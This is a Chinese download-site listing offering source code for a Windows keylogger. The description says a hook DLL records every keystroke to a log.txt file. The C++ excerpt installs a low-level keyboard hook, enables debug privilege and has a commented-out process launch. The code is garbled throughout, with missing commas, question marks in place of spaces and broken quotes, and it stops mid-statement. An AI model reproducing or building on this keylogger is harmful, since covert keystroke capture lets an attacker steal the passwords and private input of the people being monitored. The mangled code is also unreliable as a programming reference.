資源簡介
windows后臺監聽鍵盤事件,使用hook(鉤子)做的,記得先編hook.dll,再去編示例程序,hook.dll,會把監聽到的按鍵寫到hook文件夾下面的log.txt文件里面
代碼片段和文件信息
#include?
#include?
#include?
#include?“resource.h“
#pragma?comment(lib“DbgHelp.lib“)
//---------------------------用戶界面部分-------------------------------------------------
BOOL?CALLBACK?DialogProc(HWND?hWnd?UINT?uMsg?WPARAM?wParam?LPARAM?lParam);
BOOL?OnHook();
BOOL?OffHook();
BOOL?EnablePrivilege();
int?WINAPI?WinMain(HINSTANCE?hInstance?HINSTANCE?hPrevInstance?LPSTR?lpCmdLine?int?nShowCmd)
{
HWND?hWnd;
MSG?msg;
//?創建窗體
hWnd?=?CreateDialog(hInstance?MAKEINTRESOURCE(IDD_DIALOG)?NULL?DialogProc);
ShowWindow(hWnd?SW_SHOW);
//?消息循環
while?(GetMessage(&msg?NULL?0?0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return?msg.wParam;
}
//?對話框消息出來程序
BOOL?CALLBACK?DialogProc(HWND?hWnd?UINT?uMsg?WPARAM?wParam?LPARAM?lParam)
{
switch?(uMsg)
{
case?WM_INITDIALOG:?//?初始化對話框:
EnablePrivilege();
break;
case?WM_COMMAND:?//?點擊按鈕
switch?(LOWORD(wParam))
{
case?IDC_BUTTON_ON:?//?點擊掛鉤按鈕
OnHook();
break;
case?IDC_BUTTON_OFF:?//?點擊脫鉤按鈕
OffHook();
break;
default:
break;
}
break;
case?WM_CLOSE:?//?關閉窗口
DestroyWindow(hWnd);
break;
case?WM_DESTROY:?//?窗口銷毀
PostQuitMessage(0);
break;
}
return?FALSE;
}
//---------------------------------------------------鉤子部分------------------------------------------------------------
typedef?LRESULT(CALLBACK?*pCallWndProc)(int?WPARAM?LPARAM);
HHOOK?hHook;
BOOL?OnHook()?//?掛鉤
{
//?加載鉤子dll中的假Windows消息循環
HMODULE?hDll?=?LoadLibrary(TEXT(“hookdll.dll“));
pCallWndProc?CallWndProc?=?(pCallWndProc)GetProcAddress(hDll?“CallWndProc“);
////?創建淄博熱力進程
//TCHAR?szFileName[MAX_PATH];
//ZeroMemory(&szFileName?MAX_PATH?*?sizeof(TCHAR));
//GetCurrentDirectory(MAX_PATH?szFileName);
//_tcscat_s(szFileName?TEXT(“\\App\\app.exe“));
//STARTUPINFO?si;
//ZeroMemory(&si?sizeof(si));
//si.cb?=?sizeof(si);
//PROCESS_INFORMATION?pi;
//ZeroMemory(&pi?sizeof(pi));
//CreateProcess(szFileName?TEXT(“?--enable-npapi?--enable-eloamPlugin“)?NULL?NULL?FALSE?0?NULL?NULL?&si?&pi);
////WaitForSingleobject(pi.hProcess?INFINITE);
//?掛鉤
hHook?=?SetWindowsHookExW(WH_KEYBOARD_LL?CallWndProc?GetModuleHandle(TEXT(“hookdll.dll“))?0);
int?error?=?GetLastError();
char?message[100]?=?““;
char?buf[50]?=?““;
_itoa_s(error?buf?10);
strcat_s(message?“掛鉤!錯誤碼:“);
strcat_s(message?buf);
MessageBoxA(NULL?message?“鉤子“?MB_OK);
return?TRUE;
}
BOOL?OffHook()?//?脫鉤
{
UnhookWindowsHookEx(hHook);
MessageBox(NULL?TEXT(“脫鉤成功!“)?TEXT(“鉤子“)?MB_OK);
return?TRUE;
}
//?-----------------------------------------提升權限-------------------------------------------------------------------
BOOL?EnablePrivilege()
{
HANDLE?hToken;
if?(OpenProcessToken(GetCurrentProcess()?TOKEN_ADJUST_PRIVILEGES?&hToken))
{
TOKEN_PRIVILEGES?tkp;
LookupPrivilegeValue(NULL?SE_DEBUG_NAME?&tkp.Privileges[0].Luid);//修改進程權限
tkp.PrivilegeCount?=?1;
tkp.Privileges[0].Attributes?=?SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken?FALSE?&tkp?sizeo - 上一篇:icp C++實現包含測試數據
- 下一篇:《C語言庫函數速查手冊》
評論
共有 條評論
川公網安備 51152502000135號